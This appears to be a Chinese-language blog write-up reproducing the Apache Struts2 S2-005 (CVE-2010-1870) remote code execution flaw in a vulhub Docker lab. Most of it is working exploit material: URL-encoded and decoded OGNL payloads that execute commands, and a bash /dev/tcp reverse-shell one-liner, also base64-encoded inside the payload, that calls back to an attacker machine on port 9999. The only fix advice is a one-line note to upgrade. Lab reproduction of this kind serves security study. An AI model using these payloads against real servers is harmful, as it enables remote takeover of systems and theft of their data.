CVE-2010-1870 S2-005 远程代码执行漏洞
2023-02-18 16:38:48 时间
1 漏洞信息
漏洞名称 | 远程代码执行漏洞 |
|---|---|
漏洞编号 | CVE-2010-1870 |
危害等级 | 高危 |
漏洞类型 | 中间件漏洞 |
漏洞厂商 | Apache |
漏洞组件 | Struts2 |
受影响版本 | 2.0.0 <= Struts2 <= 2.1.8.1 |
2 环境搭建
2.1 环境概述
- Linux操作系统
2.2 搭建过程
拉取镜像
cd vulhub/struts2/s2-005
docker-compose up -d访问http://192.168.146.158:8105/example/HelloWorld.action
3 漏洞复现
构造一个恶意的payload并发送。
redirect%3A%24%7B%23req%3D%23context.get%28%27co%27%2B%27m.open%27%2B%27symphony.xwo%27%2B%27rk2.disp%27%2B%27atcher.HttpSer%27%2B%27vletReq%27%2B%27uest%27%29%2C%23s%3Dnew%20java.util.Scanner%28%28new%20java.lang.ProcessBuilder%28%27echo%20has%20vul%27.toString%28%29.split%28%27%5C%5Cs%27%29%29%29.start%28%29.getInputStream%28%29%29.useDelimiter%28%27%5C%5CAAAA%27%29%2C%23str%3D%23s.hasNext%28%29%3F%23s.next%28%29%3A%27%27%2C%23resp%3D%23context.get%28%27co%27%2B%27m.open%27%2B%27symphony.xwo%27%2B%27rk2.disp%27%2B%27atcher.HttpSer%27%2B%27vletRes%27%2B%27ponse%27%29%2C%23resp.setCharacterEncoding%28%27UTF-8%27%29%2C%23resp.getWriter%28%29.println%28%23str%29%2C%23resp.getWriter%28%29.flush%28%29%2C%23resp.getWriter%28%29.close%28%29%7D
payload原型:
redirect:${#req=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletReq'+'uest'),#s=new java.util.Scanner((new java.lang.ProcessBuilder('echo has vul'.toString().split('\\s'))).start().getInputStream()).useDelimiter('\\AAAA'),#str=#s.hasNext()?#s.next():'',#resp=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletRes'+'ponse'),#resp.setCharacterEncoding('UTF-8'),#resp.getWriter().println(#str),#resp.getWriter().flush(),#resp.getWriter().close()}发现成功执行了echo has vul,说明存在该漏洞。
既然发现漏洞了,那我们可以开始反弹shell
bash -i >& /dev/tcp/192.168.146.158/9999 0>&1
base加密
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}访问漏洞url并且添加恶意payload进行抓包。
redirect%3A%24%7B%23req%3D%23context.get%28%27co%27%2B%27m.open%27%2B%27symphony.xwo%27%2B%27rk2.disp%27%2B%27atcher.HttpSer%27%2B%27vletReq%27%2B%27uest%27%29%2C%23s%3Dnew%20java.util.Scanner%28%28new%20java.lang.ProcessBuilder%28%27bash%20-c%20%7Becho%2CYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx%7D%7C%7Bbase64%2C-d%7D%7C%7Bbash%2C-i%7D%27.toString%28%29.split%28%27%5C%5Cs%27%29%29%29.start%28%29.getInputStream%28%29%29.useDelimiter%28%27%5C%5CAAAA%27%29%2C%23str%3D%23s.hasNext%28%29%3F%23s.next%28%29%3A%27%27%2C%23resp%3D%23context.get%28%27co%27%2B%27m.open%27%2B%27symphony.xwo%27%2B%27rk2.disp%27%2B%27atcher.HttpSer%27%2B%27vletRes%27%2B%27ponse%27%29%2C%23resp.setCharacterEncoding%28%27UTF-8%27%29%2C%23resp.getWriter%28%29.println%28%23str%29%2C%23resp.getWriter%28%29.flush%28%29%2C%23resp.getWriter%28%29.close%28%29%7D
payload原型:
redirect:${#req=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletReq'+'uest'),#s=new java.util.Scanner((new java.lang.ProcessBuilder('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNTgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}'.toString().split('\\s'))).start().getInputStream()).useDelimiter('\\AAAA'),#str=#s.hasNext()?#s.next():'',#resp=#context.get('co'+'m.open'+'symphony.xwo'+'rk2.disp'+'atcher.HttpSer'+'vletRes'+'ponse'),#resp.setCharacterEncoding('UTF-8'),#resp.getWriter().println(#str),#resp.getWriter().flush(),#resp.getWriter().close()}攻击机进行监听,然后发现成功反弹了shell。
4 修复建议
1、推荐的解决方案:升级至比受漏洞影响的更高版本。
相关文章
- [javaEE] EL表达式调用java方法
- [javaEE] EL表达式获取数据
- [javaSE] 数据结构(AVL树基本概念)
- [javaSE] 数据结构(栈)
- [javaSE] 数据结构(队列)
- [javaSE] 数据结构(二叉树-遍历与查找)
- [javaSE] 数据结构(二叉查找树-插入节点)
- [javaSE] GUI(jar包双击运行)
- [javaSE] GUI(打开文件对话框)
- [javaSE] GUI(菜单)
- [javaSE] GUI(对话框Dialog)
- [javaSE] GUI(练习-列出指定目录内容)
- [javaEE] 控制浏览器缓存资源
- [javaEE] response实现图片下载
- [javaSE] GUI(鼠标事件)
- [javaSE] 网络编程(TCP-并发上传图片)
- [javaSE] IO流(装饰设计模式)
- [javaSE] 集合框架(Map概述)
- [javaSE] 多线程(join方法)
- [javaSE] 多线程(守护线程)